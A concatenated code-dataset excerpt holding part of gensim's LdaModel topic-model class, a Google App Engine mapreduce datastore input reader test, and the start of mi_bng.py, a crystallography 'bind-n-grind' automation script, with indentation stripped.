gamma[d, :] = gammad
if collect_sstats:
# Contribution of document d to the expected sufficient
# statistics for the M step.
sstats[:, ids] += np.outer(expElogthetad.T, cts / phinorm)
if len(chunk) > 1:
logger.debug("%i/%i documents converged within %i iterations",
converged, len(chunk), self.iterations)
if collect_sstats:
# This step finishes computing the sufficient statistics for the
# M step, so that
# sstats[k, w] = \sum_d n_{dw} * phi_{dwk}
# = \sum_d n_{dw} * exp{Elogtheta_{dk} + Elogbeta_{kw}} / phinorm_{dw}.
sstats *= self.expElogbeta
return gamma, sstats
def do_estep(self, chunk, state=None):
"""
Perform inference on a chunk of documents, and accumulate the collected
sufficient statistics in `state` (or `self.state` if None).
"""
if state is None:
state = self.state
gamma, sstats = self.inference(chunk, collect_sstats=True)
state.sstats += sstats
state.numdocs += gamma.shape[0] # avoids calling len(chunk) on a generator
return gamma
def update_alpha(self, gammat, rho):
"""
Update parameters for the Dirichlet prior on the per-document
topic weights `alpha` given the last `gammat`.
"""
N = float(len(gammat))
logphat = sum(dirichlet_expectation(gamma) for gamma in gammat) / N
self.alpha = update_dir_prior(self.alpha, N, logphat, rho)
logger.info("optimized alpha %s", list(self.alpha))
return self.alpha
def update_eta(self, lambdat, rho):
"""
Update parameters for the Dirichlet prior on the per-topic
word weights `eta` given the last `lambdat`.
"""
N = float(lambdat.shape[0])
logphat = (sum(dirichlet_expectation(lambda_) for lambda_ in lambdat) / N).reshape((self.num_terms,))
self.eta = update_dir_prior(self.eta, N, logphat, rho)
return self.eta
def log_perplexity(self, chunk, total_docs=None):
"""
Calculate and return per-word likelihood bound, using the `chunk` of
documents as evaluation corpus. Also output the calculated statistics. incl.
perplexity=2^(-bound), to log at INFO level.
"""
if total_docs is None:
total_docs = len(chunk)
corpus_words = sum(cnt for document in chunk for _, cnt in document)
subsample_ratio = 1.0 * total_docs / len(chunk)
perwordbound = self.bound(chunk, subsample_ratio=subsample_ratio) / (subsample_ratio * corpus_words)
logger.info("%.3f per-word bound, %.1f perplexity estimate based on a held-out corpus of %i documents with %i words" %
(perwordbound, np.exp2(-perwordbound), len(chunk), corpus_words))
return perwordbound
def update(self, corpus, chunksize=None, decay=None, offset=None,
passes=None, update_every=None, eval_every=None, iterations=None,
gamma_threshold=None, chunks_as_numpy=False):
"""
Train the model with new documents, by EM-iterating over `corpus` until
the topics converge (or until the maximum number of allowed iterations
is reached). `corpus` must be an iterable (repeatable stream of documents),
In distributed mode, the E step is distributed over a cluster of machines.
This update also supports updating an already trained model (`self`)
with new documents from `corpus`; the two models are then merged in
proportion to the number of old vs. new documents. This feature is still
experimental for non-stationary input streams.
For stationary input (no topic drift in new documents), on the other hand,
this equals the online update of Hoffman et al. and is guaranteed to
converge for any `decay` in (0.5, 1.0>. Additionally, for smaller
`corpus` sizes, an increasing `offset` may be beneficial (see
Table 1 in Hoffman et al.)
Args:
corpus (gensim corpus): The corpus with which the LDA model should be updated.
chunks_as_numpy (bool): Whether each chunk passed to `.inference` should be a np
array of not. np can in some settings turn the term IDs
into floats, these will be converted back into integers in
inference, which incurs a performance hit. For distributed
computing it may be desirable to keep the chunks as np
arrays.
For other parameter settings, see :class:`LdaModel` constructor.
"""
# use parameters given in constructor, unless user explicitly overrode them
if decay is None:
decay = self.decay
if offset is None:
offset = self.offset
if passes is None:
passes = self.passes
if update_every is None:
update_every = self.update_every
if eval_every is None:
eval_every = self.eval_every
if iterations is None:
iterations = self.iterations
if gamma_threshold is None:
gamma_threshold = self.gamma_threshold
try:
lencorpus = len(corpus)
except Exception:
logger.warning("input corpus stream has no len(); counting documents")
lencorpus = sum(1 for _ in corpus)
if lencorpus == 0:
logger.warning("LdaModel.update() called with an empty corpus")
return
if chunksize is None:
chunksize = min(lencorpus, self.chunksize)
self.state.numdocs += lencorpus
if update_every:
updatetype = "online"
if passes == 1:
updatetype += " (single-pass)"
else:
updatetype += " (multi-pass)"
updateafter = min(lencorpus, update_every * self.numworkers * chunksize)
else:
updatetype = "batch"
updateafter = lencorpus
evalafter = min(lencorpus, (eval_every or 0) * self.numworkers * chunksize)
updates_per_pass = max(1, lencorpus / updateafter)
logger.info(
"running %s LDA training, %s topics, %i passes over "
"the supplied corpus of %i documents, updating model once "
"every %i documents, evaluating perplexity every %i documents, "
"iterating %ix with a convergence threshold of %f",
updatetype, self.num_topics, passes, lencorpus,
updateafter, evalafter, iterations,
gamma_threshold)
if updates_per_pass * passes < 10:
logger.warning(
"too few updates, training might not converge; consider "
"increasing the number of passes or iterations to improve accuracy")
# rho is the "speed" of updating; TODO try other fncs
# pass_ + num_updates handles increasing the starting t for each pass,
# while allowing it to "reset" on the first pass of each update
def rho():
return pow(offset + pass_ + (self.num_updates / chunksize), -decay)
if self.callbacks:
# pass the list of input callbacks to Callback class
callback = Callback(self.callbacks)
callback.set_model(self)
# initialize metrics list to store metric values after every epoch
self.metrics = defaultdict(list)
for pass_ in xrange(passes):
if self.dispatcher:
logger.info('initializing %s workers' % self.numworkers)
self.dispatcher.reset(self.state)
else:
other = LdaState(self.eta, self.state.sstats.shape)
dirty = False
reallen = 0
for chunk_no, chunk in enumerate(utils.grouper(corpus, chunksize, as_numpy=chunks_as_numpy)):
reallen += len(chunk) # keep track of how many documents we've processed so far
if eval_every and ((reallen == lencorpus) or ((chunk_no + 1) % (eval_every * self.numworkers) == 0)):
self.log_perplexity(chunk, total_docs=lencorpus)
if self.dispatcher:
# add the chunk to dispatcher's job queue, so workers can munch on it
logger.info('PROGRESS: pass %i, dispatching documents up to #%i/%i',
pass_, chunk_no * chunksize + len(chunk), lencorpus)
# this will eventually block until some jobs finish, because the queue has a small finite length
self.dispatcher.putjob(chunk)
else:
logger.info('PROGRESS: pass %i, at document #%i/%i',
pass_, chunk_no * chunksize + len(chunk), lencorpus)
gammat = self.do_estep(chunk, other)
if self.optimize_alpha:
self.update_alpha(gammat, rho())
dirty = True
del chunk
# perform an M step. determine when based on update_every, don't do this after every chunk
if update_every and (chunk_no + 1) % (update_every * self.numworkers) == 0:
if self.dispatcher:
# distributed mode: wait for all workers to finish
logger.info("reached the end of input; now waiting for all remaining jobs to finish")
other = self.dispatcher.getstate()
self.do_mstep(rho(), other, pass_ > 0)
del other # frees up memory
if self.dispatcher:
logger.info('initializing workers')
self.dispatcher.reset(self.state)
else:
other = LdaState(self.eta, self.state.sstats.shape)
dirty = False
# endfor single corpus iteration
if reallen != lencorpus:
raise RuntimeError("input corpus size changed during training (don't use generators as input)")
# append current epoch's metric values
if self.callbacks:
current_metrics = callback.on_epoch_end(pass_)
for metric, value in current_metrics.items():
self.metrics[metric].append(value)
if dirty:
# finish any remaining updates
if self.dispatcher:
# distributed mode: wait for all workers to finish
logger.info("reached the end of input; now waiting for all remaining jobs to finish")
other = self.dispatcher.getstate()
self.do_mstep(rho(), other, pass_ > 0)
del other
dirty = False
# endfor entire corpus update
def do_mstep(self, rho, other, extra_pass=False):
"""
M step: use linear interpolation between the existing topics and
collected sufficient statistics in `other` to update the topics.
"""
logger.debug("updating topics")
# update self with the new blend; also keep track of how much did
# the topics change through this update, to assess convergence
diff = np.log(self.expElogbeta)
self.state.blend(rho, other)
diff -= self.state.get_Elogbeta()
self.sync_state()
# print out some debug info at the end of each EM iteration
self.print_topics(5)
logger.info("topic diff=%f, rho=%f", np.mean(np.abs(diff)), rho)
if self.optimize_eta:
self.update_eta(self.state.get_lambda(), rho)
if not extra_pass:
# only update if this isn't an additional pass
self.num_updates += other.numdocs
def bound(self, corpus, gamma=None, subsample_ratio=1.0):
"""
Estimate the variational bound of documents from `corpus`:
E_q[log p(corpus)] - E_q[log q(corpus)]
Args:
corpus: documents to infer variational bounds from.
gamma: the variational parameters on topic weights for each `corpus`
document (=2d matrix=what comes out of `inference()`).
If not supplied, will be inferred from the model.
subsample_ratio (float): If `corpus` is a sample of the whole corpus,
pass this to inform on what proportion of the corpus it represents.
This is used as a multiplicative factor to scale the likelihood
appropriately.
Returns:
The variational bound score calculated.
"""
score = 0.0
_lambda = self.state.get_lambda()
Elogbeta = dirichlet_expectation(_lambda)
for d, doc in enumerate(corpus): # stream the input doc-by-doc, in case it's too large to fit in RAM
if d % self.chunksize == 0:
logger.debug("bound: at document #%i", d)
if gamma is None:
gammad, _ = self.inference([doc])
else:
gammad = gamma[d]
Elogthetad = dirichlet_expectation(gammad)
# E[log p(doc | theta, beta)]
score += np.sum(cnt * logsumexp(Elogthetad + Elogbeta[:, int(id)]) for id, cnt in doc)
# E[log p(theta | alpha) - log q(theta | gamma)]; assumes alpha is a vector
score += np.sum((self.alpha - gammad) * Elogthetad)
score += np.sum(gammaln(gammad) - gammaln(self.alpha))
score += gammaln(np.sum(self.alpha)) - gammaln(np.sum(gammad))
# Compensate likelihood for when `corpus` above is only a sample of the whole corpus. This ensures
# that the likelihood is always rougly on the same scale.
score *= subsample_ratio
# E[log p(beta | eta) - log q (beta | lambda)]; assumes eta is a scalar
score += np.sum((self.eta - _lambda) * Elogbeta)
score += np.sum(gammaln(_lambda) - gammaln(self.eta))
if np.ndim(self.eta) == 0:
sum_eta = self.eta * self.num_terms
else:
sum_eta = np.sum(self.eta)
score += np.sum(gammaln(sum_eta) - gammaln(np.sum(_lambda, 1)))
return score
def show_topics(self, num_topics=10, num_words=10, log=False, formatted=True):
"""
Args:
num_topics (int): show results for first `num_topics` topics.
Unlike LSA, there is no natural ordering between the topics in LDA.
The returned `num_topics <= self.num_topics` subset of all topics is
therefore arbitrary and may change between two LDA training runs.
num_words (int): include top `num_words` with highest probabilities in topic.
log (bool): If True, log output in addition to returning it.
formatted (bool): If True, format topics as strings, otherwise return them as
`(word, probability) 2-tuples.
Returns:
list: `num_words` most significant words for `num_topics` number of topics
(10 words for top 10 topics, by default).
"""
if num_topics < 0 or num_topics >= self.num_topics:
num_topics = self.num_topics
chosen_topics = range(num_topics)
else:
num_topics = min(num_topics, self.num_topics)
# add a little random jitter, to randomize results around the same alpha
sort_alpha = self.alpha + 0.0001 * self.random_state.rand(len(self.alpha))
sorted_topics = list(matutils.argsort(sort_alpha))
chosen_topics = sorted_topics[:num_topics // 2] + sorted_topics[-num_topics // 2:]
shown = []
topic = self.state.get_lambda()
for i in chosen_topics:
topic_ = topic[i]
topic_ = topic_ / topic_.sum() # normalize to probability distribution
bestn = matutils.argsort(topic_, num_words, reverse=True)
topic_ = [(self.id2word[id], topic_[id]) for id in bestn]
if formatted:
topic_ = ' + '.join(['%.3f*"%s"' % (v, k) for k, v in topic_])
shown.append((i, topic_))
if log:
logger.info("topic #%i (%.3f): %s", i, self.alpha[i], topic_)
return shown
def show_topic(self, topicid, topn=10):
"""
Args:
topn (int): Only return 2-tuples for the topn most probable words
(ignore the rest).
Returns:
list: of `(word, probability)` 2-tuples for the most probable
words in topic `topicid`.
"""
return [(self.id2word[id], value) for id, value in self.get_topic_terms(topicid, topn)]
def get_topics(self):
"""
Returns:
np.ndarray: `num_topics` x `vocabulary_size` array of floats which represents
the term topic matrix learned during inference.
"""
topics = self.state.get_lambda()
return topics / topics.sum(axis=1)[:, None]
def get_topic_terms(self, topicid, topn=10):
"""
Args:
topn (int): Only return 2-tuples for the topn most probable words
(ignore the rest).
Returns:
list: `(word_id, probability)` 2-tuples for the most probable words
in topic with id `topicid`.
"""
topic = self.get_topics()[topicid]
topic = topic / topic.sum() # normalize to probability distribution
bestn = matutils.argsort(topic, topn, reverse=True)
return [(id, topic[id]) for id in bestn]
def top_topics(self, corpus=None, texts=None, dictionary=None, window_size=None,
coherence='u_mass', topn=20, processes=-1):
"""
Calculate the coherence for each topic; default is Umass coherence.
See the :class:`gensim.models.CoherenceModel` constructor for more info on the
parameters and the different coherence metrics.
Returns:
list: tuples with `(topic_repr, coherence_score)`, where `topic_repr` is a list
of representations of the `topn` terms for the topic. The terms are represented
as tuples of `(membership_in_topic, token)`. The `coherence_score` is a float.
"""
cm = CoherenceModel(
model=self, corpus=corpus, texts=texts, dictionary=dictionary,
window_size=window_size, coherence=coherence, topn=topn,
processes=processes)
coherence_scores = cm.get_coherence_per_topic()
str_topics = []
for topic in self.get_topics(): # topic = array of vocab_size floats, one per term
bestn = matutils.argsort(topic, topn=topn, reverse=True) # top terms for topic
beststr = [(topic[_id], self.id2word[_id]) for _id in bestn] # membership, token
str_topics.append(beststr) # list of topn (float membership, token) tuples
scored_topics = zip(str_topics, coherence_scores)
return sorted(scored_topics, key=lambda tup: tup[1], reverse=True)
def get_document_topics(self, bow, minimum_probability=None, minimum_phi_value=None,
per_word_topics=False):
"""
Args:
bow (list): Bag-of-words representation of the document to get topics for.
minimum_probability (float): Ignore topics with probability below this value
(None by default). If set to None, a value of 1e-8 is used to prevent 0s.
per_word_topics (bool): If True, also returns a list of topics, sorted in
descending order of most likely topics for that word. It also returns a list
of word_ids and each words corresponding topics' phi_values, multiplied by
feature length (i.e, word count).
minimum_phi_value (float): if `per_word_topics` is True, this represents a lower
bound on the term probabilities that are included (None by default). If set
to None, a value of 1e-8 is used to prevent 0s.
Returns:
topic distribution for the given document `bow`, as a list of
`(topic_id, topic_probability)` 2-tuples.
"""
if minimum_probability is None:
minimum_probability = self.minimum_probability
minimum_probability = max(minimum_probability, 1e-8) # never allow zero values in sparse output
if minimum_phi_value is None:
minimum_phi_value = self.minimum_probability
minimum_phi_value = max(minimum_phi_value, 1e-8) # never allow zero values in sparse output
# if the input vector is a corpus, return a transformed corpus
is_corpus, corpus = utils.is_corpus(bow)
if is_corpus:
kwargs = dict(
per_word_topics=per_word_topics,
minimum_probability=minimum_probability,
minimum_phi_value=minimum_phi_value
)
return self._apply(corpus, **kwargs)
gamma, phis = self.inference([bow], collect_sstats=per_word_topics)
topic_dist = gamma[0] / sum(gamma[0]) # normalize distribution
document_topics = [
(topicid, topicvalue) for topicid, topicvalue in enumerate(topic_dist)
if topicvalue >= minimum_probability
]
if not per_word_topics:
return document_topics
word_topic = [] # contains word and corresponding topic
word_phi = [] # contains word and phi values
for word_type, weight in bow:
phi_values = [] # contains (phi_value, topic) pairing to later be sorted
phi_topic = [] # contains topic and corresponding phi value to be returned 'raw' to user
for topic_id in range(0, self.num_topics):
if phis[topic_id][word_type] >= minimum_phi_value:
# appends phi values for each topic for that word
# these phi values are scaled by feature length
phi_values.append((phis[topic_id][word_type], topic_id))
phi_topic.append((topic_id, phis[topic_id][word_type]))
# list with ({word_id => [(topic_0, phi_value), (topic_1, phi_value) ...]).
word_phi.append((word_type, phi_topic))
# sorts the topics based on most likely topic
# returns a list like ({word_id => [topic_id_most_probable, topic_id_second_most_probable, ...]).
sorted_phi_values = sorted(phi_values, reverse=True)
topics_sorted = [x[1] for x in sorted_phi_values]
word_topic.append((word_type, topics_sorted))
return document_topics, word_topic, word_phi # returns 2-tuple
def get_term_topics(self, word_id, minimum_probability=None):
"""
Args:
word_id (int): ID of the word to get topic probabilities for.
minimum_probability (float): Only include topic probabilities above this
value (None by default). If set to None, use 1e-8 to prevent including 0s.
Returns:
list: The most likely topics for the given word. Each topic is represented
as a tuple of `(topic_id, term_probability)`.
"""
if minimum_probability is None:
minimum_probability = self.minimum_probability
minimum_probability = max(minimum_probability, 1e-8) # never allow zero values in sparse output
# if user enters word instead of id in vocab, change to get id
if isinstance(word_id, str):
word_id = self.id2word.doc2bow([word_id])[0][0]
values = []
for topic_id in range(0, self.num_topics):
if self.expElogbeta[topic_id][word_id] >= minimum_probability:
values.append((topic_id, self.expElogbeta[topic_id][word_id]))
return values
def diff(self, other, distance="kullback_leibler", num_words=100, n_ann_terms=10, diagonal=False, annotation=True, normed=True):
"""
Calculate difference topic2topic between two Lda models
`other` instances of `LdaMulticore` or `LdaModel`
`distance` is function that will be applied to calculate difference between any topic pair.
Available values: `kullback_leibler`, `hellinger`, `jaccard` and `jensen_shannon`
`num_words` is quantity of most relevant words that used if distance == `jaccard` (also used for annotation)
`n_ann_terms` is max quantity of words in intersection/symmetric difference between topics (used for annotation)
`diagonal` set to True if the difference is required only between the identical topic no.s (returns diagonal of diff matrix)
`annotation` whether the intersection or difference of words between two topics should be returned
Returns a matrix Z with shape (m1.num_topics, m2.num_topics), where Z[i][j] - difference between topic_i and topic_j
and matrix annotation (if True) with shape (m1.num_topics, m2.num_topics, 2, None),
where:
annotation[i][j] = [[`int_1`, `int_2`, ...], [`diff_1`, `diff_2`, ...]] and
`int_k` is word from intersection of `topic_i` and `topic_j` and
`diff_l` is word from symmetric difference of `topic_i` and `topic_j`
`normed` is a flag. If `true`, matrix Z will be normalized
Example:
>>> m1, m2 = LdaMulticore.load(path_1), LdaMulticore.load(path_2)
>>> mdiff, annotation = m1.diff(m2)
>>> print(mdiff) # get matrix with difference for each topic pair from `m1` and `m2`
>>> print(annotation) # get array with positive/negative words for each topic pair from `m1` and `m2`
"""
distances = {
"kullback_leibler": kullback_leibler,
"hellinger": hellinger,
"jaccard": jaccard_distance,
"jensen_shannon": jensen_shannon
}
if distance not in distances:
valid_keys = ", ".join("`{}`".format(x) for x in distances.keys())
raise ValueError("Incorrect distance, valid only {}".format(valid_keys))
if not isinstance(other, self.__class__):
raise ValueError("The parameter `other` must be of type `{}`".format(self.__name__))
distance_func = distances[distance]
d1, d2 = self.get_topics(), other.get_topics()
t1_size, t2_size = d1.shape[0], d2.shape[0]
annotation_terms = None
fst_topics = [{w for (w, _) in self.show_topic(topic, topn=num_words)} for topic in xrange(t1_size)]
snd_topics = [{w for (w, _) in other.show_topic(topic, topn=num_words)} for topic in xrange(t2_size)]
if distance == "jaccard":
d1, d2 = fst_topics, snd_topics
if diagonal:
assert t1_size == t2_size, "Both input models should have same no. of topics, as the diagonal will only be valid in a square matrix"
# initialize z and annotation array
z = np.zeros(t1_size)
if annotation:
annotation_terms = np.zeros(t1_size, dtype=list)
else:
# initialize z and annotation matrix
z = np.zeros((t1_size, t2_size))
if annotation:
annotation_terms = np.zeros((t1_size, t2_size), dtype=list)
# iterate over each cell in the initialized z and annotation
for topic in np.ndindex(z.shape):
topic1 = topic[0]
if diagonal:
topic2 = topic1
else:
topic2 = topic[1]
z[topic] = distance_func(d1[topic1], d2[topic2])
if annotation:
pos_tokens = fst_topics[topic1] & snd_topics[topic2]
neg_tokens = fst_topics[topic1].symmetric_difference(snd_topics[topic2])
pos_tokens = list(pos_tokens)[:min(len(pos_tokens), n_ann_terms)]
neg_tokens = list(neg_tokens)[:min(len(neg_tokens), n_ann_terms)]
annotation_terms[topic] = [pos_tokens, neg_tokens]
if normed:
if np.abs(np.max(z)) > 1e-8:
z /= np.max(z)
return z, annotation_terms
def __getitem__(self, bow, eps=None):
"""
Args:
bow (list): Bag-of-words representation of a document.
eps (float): Ignore topics with probability below `eps`.
Returns:
topic distribution for the given document `bow`, as a list of
`(topic_id, topic_probability)` 2-tuples.
"""
return self.get_document_topics(bow, eps, self.minimum_phi_value, self.per_word_topics)
def save(self, fname, ignore=['state', 'dispatcher'], separately=None, *args, **kwargs):
"""
Save the model to file.
Large internal arrays may be stored into separate files, with `fname` as prefix.
`separately` can be used to define which arrays should be stored in separate files.
`ignore` parameter can be used to define which variables should be ignored, i.e. left
out from the pickled lda model. By default the internal `state` is ignored as it uses
its own serialisation not the one provided by `LdaModel`. The `state` and `dispatcher`
will be added to any ignore parameter defined.
Note: do not save as a compressed file if you intend to load the file back with `mmap`.
Note: If you intend to use models across Python 2/3 versions there are a few things to
keep in mind:
1. The pickled Python dictionaries will not work across Python versions
2. The `save` method does not automatically save all np arrays using np, only
those ones that exceed `sep_limit` set in `gensim.utils.SaveLoad.save`. The main
concern here is the `alpha` array if for instance using `alpha='auto'`.
Please refer to the wiki recipes section (https://github.com/piskvorky/gensim/wiki/Recipes-&-FAQ#q9-how-do-i-load-a-model-in-python-3-that-was-trained-and-saved-using-python-2)
for an example on how to work around these issues.
"""
if self.state is not None:
self.state.save(utils.smart_extension(fname, '.state'), *args, **kwargs)
# Save the dictionary separately if not in 'ignore'.
if 'id2word' not in ignore:
utils.pickle(self.id2word, utils.smart_extension(fname, '.id2word'))
# make sure 'state', 'id2word' and 'dispatcher' are ignored from the pickled object, even if
# someone sets the ignore list themselves
if ignore is not None and ignore:
if isinstance(ignore, six.string_types):
ignore = [ignore]
ignore = [e for e in ignore if e] # make sure None and '' are not in the list
ignore = list(set(['state', 'dispatcher', 'id2word']) | set(ignore))
else:
ignore = ['state', 'dispatcher', 'id2word']
# make sure 'expElogbeta' and 'sstats' are ignored from the pickled object, even if
# someone sets the separately list themselves.
separately_explicit = ['expElogbeta', 'sstats']
# Also add 'alpha' and 'eta' to separately list if they are set 'auto' or some
# array manually.
if (isinstance(self.alpha, six.string_types) and self.alpha == 'auto') or (isinstance(self.alpha, np.ndarray) and len(self.alpha.shape) != 1):
separately_explicit.append('alpha')
if (isinstance(self.eta, six.string_types) and self.eta == 'auto') or (isinstance(self.eta, np.ndarray) and len(self.eta.shape) != 1):
separately_explicit.append('eta')
# Merge separately_explicit with separately.
if separately:
if isinstance(separately, six.string_types):
separately = [separately]
separately = [e for e in separately if e] # make sure None and '' are not in the list
separately = list(set(separately_explicit) | set(separately))
else:
separately = separately_explicit
super(LdaModel, self).save(fname, ignore=ignore, separately=separately, *args, **kwargs)
@classmethod
def load(cls, fname, *args, **kwargs):
"""
Load a previously saved object from file (also see `save`).
Large arrays can be memmap'ed back as read-only (shared memory) by setting `mmap='r'`:
>>> LdaModel.load(fname, mmap='r')
"""
kwargs['mmap'] = kwargs.get('mmap', None)
result = super(LdaModel, cls).load(fname, *args, **kwargs)
# check if `random_state` attribute has been set after main pickle load
# if set -> the model to be loaded was saved using a >= 0.13.2 version of Gensim
# if not set -> the model to be loaded was saved using a < 0.13.2 version of Gensim, so set `random_state` as the default value
if not hasattr(result, 'random_state'):
result.random_state = utils.get_random_state(None) # using default value `get_random_state(None)`
logging.warning("random_state not set so using default value")
state_fname = utils.smart_extension(fname, '.state')
try:
result.state = super(LdaModel, cls).load(state_fname, *args, **kwargs)
except Exception as e:
logging.warning("failed to load state from %s: %s", state_fname, e)
id2word_fname = utils.smart_extension(fname, '.id2word')
# check if `id2word_fname` file is present on disk
# if present -> the model to be loaded was saved using a >= 0.13.2 version of Gensim, so set `result.id2word` using the `id2word_fname` file
# if not present -> the model to be loaded was saved using a < 0.13.2 version of Gensim, so `result.id2word` already set after the main pickle load
if (os.path.isfile(id2word_fname)):
try:
result.id2word = utils.unpickle(id2word_fname)
except Exception as e:
logging.warning("failed to load id2word dictionary from %s: %s", id2word_fname, e)
return result
# endclass LdaModel
|
lgpl-2.1
|
talele08/appengine-mapreduce
|
python/test/mapreduce/api/map_job/model_datastore_input_reader_test.py
|
15
|
8510
|
#!/usr/bin/env python
"""Model Datastore Input Reader tests for the map_job API."""
# os_compat must be first to ensure timezones are UTC.
# pylint: disable=g-bad-import-order
from google.appengine.tools import os_compat # pylint: disable=unused-import
import datetime
import unittest
from google.appengine.ext import ndb
from mapreduce import errors
from testlib import testutil
from mapreduce.api import map_job
from mapreduce.api.map_job import datastore_input_reader_base_test
from mapreduce.api.map_job import model_datastore_input_reader
# pylint: disable=invalid-name
class ModelDBDatastoreInputReaderTest(datastore_input_reader_base_test
.DatastoreInputReaderBaseTest):
"""Test ModelDatastoreInputReader using Model.db."""
@property
def reader_cls(self):
return model_datastore_input_reader.ModelDatastoreInputReader
@property
def entity_kind(self):
return testutil.ENTITY_KIND
def testValidate_EntityKindWithNoModel(self):
"""Test validate function with no model."""
params = {
"entity_kind": "foo",
}
conf = map_job.JobConfig(
job_name=self.TEST_JOB_NAME,
mapper=map_job.Mapper,
input_reader_cls=self.reader_cls,
input_reader_params=params,
shard_count=1)
self.assertRaises(errors.BadReaderParamsError,
conf.input_reader_cls.validate,
conf)
def testValidate_Filters(self):
"""Tests validating filters parameter."""
params = {
"entity_kind": self.entity_kind,
"filters": [("a", "=", 1), ("b", "=", 2)],
}
new = datetime.datetime.now()
old = new.replace(year=new.year-1)
conf = map_job.JobConfig(
job_name=self.TEST_JOB_NAME,
mapper=map_job.Mapper,
input_reader_cls=self.reader_cls,
input_reader_params=params,
shard_count=1)
conf.input_reader_cls.validate(conf)
conf.input_reader_params["filters"] = [["a", ">", 1], ["a", "<", 2]]
conf.input_reader_cls.validate(conf)
conf.input_reader_params["filters"] = [["datetime_property", ">", old],
["datetime_property", "<=", new],
["a", "=", 1]]
conf.input_reader_cls.validate(conf)
conf.input_reader_params["filters"] = [["a", "=", 1]]
conf.input_reader_cls.validate(conf)
# Invalid field c
conf.input_reader_params["filters"] = [("c", "=", 1)]
self.assertRaises(errors.BadReaderParamsError,
conf.input_reader_cls.validate,
conf)
# Expect a range.
conf.input_reader_params["filters"] = [("a", "<=", 1)]
self.assertRaises(errors.BadReaderParamsError,
conf.input_reader_cls.validate,
conf)
# Value should be a datetime.
conf.input_reader_params["filters"] = [["datetime_property", ">", 1],
["datetime_property", "<=",
datetime.datetime.now()]]
self.assertRaises(errors.BadReaderParamsError,
conf.input_reader_cls.validate,
conf)
# Expect a closed range.
params["filters"] = [["datetime_property", ">", new],
["datetime_property", "<=", old]]
self.assertRaises(errors.BadReaderParamsError,
conf.input_reader_cls.validate,
conf)
def _set_vals(self, entities, a_vals, b_vals):
"""Set a, b values for entities."""
vals = []
for a in a_vals:
for b in b_vals:
vals.append((a, b))
for e, val in zip(entities, vals):
e.a = val[0]
e.b = val[1]
e.put()
def testSplitInput_shardByFilters_withNs(self):
entities = self._create_entities(range(12), {}, "f")
self._set_vals(entities, list(range(6)), list(range(2)))
params = {
"entity_kind": self.entity_kind,
"namespace": "f",
"filters": [("a", ">", 0),
("a", "<=", 3),
("b", "=", 1)],
}
conf = map_job.JobConfig(
job_name=self.TEST_JOB_NAME,
mapper=map_job.Mapper,
input_reader_cls=self.reader_cls,
input_reader_params=params,
shard_count=2)
results = conf.input_reader_cls.split_input(conf)
self.assertEquals(2, len(results))
self._assertEquals_splitInput(results[0], ["3", "5"])
self._assertEquals_splitInput(results[1], ["7"])
def testSplitInput_shardByFilters_noEntity(self):
params = {
"entity_kind": self.entity_kind,
"namespace": "f",
"filters": [("a", ">", 0), ("a", "<=", 3), ("b", "=", 1)]
}
conf = map_job.JobConfig(
job_name=self.TEST_JOB_NAME,
mapper=map_job.Mapper,
input_reader_cls=self.reader_cls,
input_reader_params=params,
shard_count=100)
results = conf.input_reader_cls.split_input(conf)
self.assertEquals(3, len(results))
self._assertEquals_splitInput(results[0], [])
self._assertEquals_splitInput(results[1], [])
self._assertEquals_splitInput(results[2], [])
def testSplitInput_shardByFilters_bigShardNumber(self):
entities = self._create_entities(range(12), {}, "f")
self._set_vals(entities, list(range(6)), list(range(2)))
params = {
"entity_kind": self.entity_kind,
"namespace": "f",
"filters": [("a", ">", 0), ("a", "<=", 3), ("b", "=", 1)]
}
conf = map_job.JobConfig(
job_name=self.TEST_JOB_NAME,
mapper=map_job.Mapper,
input_reader_cls=self.reader_cls,
input_reader_params=params,
shard_count=100)
results = conf.input_reader_cls.split_input(conf)
self.assertEquals(3, len(results))
self._assertEquals_splitInput(results[0], ["3"])
self._assertEquals_splitInput(results[1], ["5"])
self._assertEquals_splitInput(results[2], ["7"])
def testSplitInput_shardByFilters_lotsOfNS(self):
"""Lots means more than 2 in test cases."""
entities = self._create_entities(range(12), {}, "f")
self._set_vals(entities, list(range(6)), list(range(2)))
entities = self._create_entities(range(12, 24), {}, "g")
self._set_vals(entities, list(range(6)), list(range(2)))
entities = self._create_entities(range(24, 36), {}, "h")
self._set_vals(entities, list(range(6)), list(range(2)))
entities = self._create_entities(range(36, 48), {}, "h")
self._set_vals(entities, [0]*6, list(range(2)))
params = {
"entity_kind": self.entity_kind,
"filters": [("a", ">", 0), ("a", "<=", 3), ("b", "=", 1)]
}
conf = map_job.JobConfig(
job_name=self.TEST_JOB_NAME,
mapper=map_job.Mapper,
input_reader_cls=self.reader_cls,
input_reader_params=params,
shard_count=100)
results = conf.input_reader_cls.split_input(conf)
self.assertEquals(3, len(results))
self._assertEquals_splitInput(results[0], ["3", "5", "7"])
self._assertEquals_splitInput(results[1], ["15", "17", "19"])
self._assertEquals_splitInput(results[2], ["27", "29", "31"])
class ModelNDBDatastoreInputReaderTest(datastore_input_reader_base_test
.DatastoreInputReaderBaseTest):
"""Test ModelDatastoreInputReader using Model.ndb."""
@property
def reader_cls(self):
return model_datastore_input_reader.ModelDatastoreInputReader
@property
def entity_kind(self):
return testutil.NDB_ENTITY_KIND
def _create_entities(self,
keys_itr,
key_to_scatter_val,
ns=None,
entity_model_cls=testutil.NdbTestEntity):
"""Create ndb entities for tests.
Args:
keys_itr: an iterator that contains all the key names.
Will be casted to str.
key_to_scatter_val: a dict that maps key names to its scatter values.
ns: the namespace to create the entity at.
entity_model_cls: entity model class.
Returns:
A list of entities created.
"""
testutil.set_scatter_setter(key_to_scatter_val)
entities = []
for i in keys_itr:
k = ndb.Key(entity_model_cls._get_kind(), str(i), namespace=ns)
entity = entity_model_cls(key=k)
entities.append(entity)
entity.put()
return entities
def _get_keyname(self, entity):
return entity.key.id()
if __name__ == "__main__":
unittest.main()
|
apache-2.0
|
mifit/miexpert
|
mi_bng.py
|
1
|
55765
|
######################################################################
# #
# Runs 'bind-n-grind' automation including refinement data #
# preparation, MR, refinement, rigid-ligand fitting and MIFit launch #
# #
# Copyright: Molecular Images 2005 #
# #
# This script is distributed under the same conditions as MIFit #
# #
######################################################################
import sys
import os
import time
import string
import dircache
import getopt
import ccp4check
def Usage():
print "Usage: %s [options]" % sys.argv[0]
print "Options are:"
print " --hklin=FILE Data file (option may be repeated)"
print " --workdir=DIR Working dir (option may be repeated)"
print " --spacegroup_no=NUM The spacegroup number to use"
print " --reference_mtz=FILE "
print " --pdbin=FILE The input coordinate file."
print " --multi_search=yes or no Try all pdb files in pdbin's directory? Default: no"
